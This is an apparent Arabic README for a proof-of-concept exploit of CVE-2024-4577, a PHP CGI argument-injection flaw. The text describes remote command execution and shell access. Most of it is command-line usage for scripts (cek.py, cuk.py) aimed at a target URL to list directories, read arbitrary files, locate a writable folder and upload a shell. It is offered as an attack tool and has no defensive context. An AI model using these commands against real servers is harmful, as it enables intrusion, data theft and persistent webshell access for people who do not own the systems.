
إثبات مفهوم لاستغلال CVE-2024-4577، وهي ثغرة حقن وسائط في PHP CGI، تتيح تنفيذ الأوامر عن بُعد والوصول إلى الصدفة على الأهداف المعرضة للخطر.
RCEpython3 cek.py --target http://target/index.php --ls --dir /path/to/directory
python3 cek.py --target https://target/index.php --dir /path/to/directory
python3 cek.py --target https://target/index.php --cat /path/to/directory
العثور على مجلد قابل للكتابة
python3 cek.py --target https://target/index.php --find
تحميل شيل
python3 cuk.py --target https://target/index.php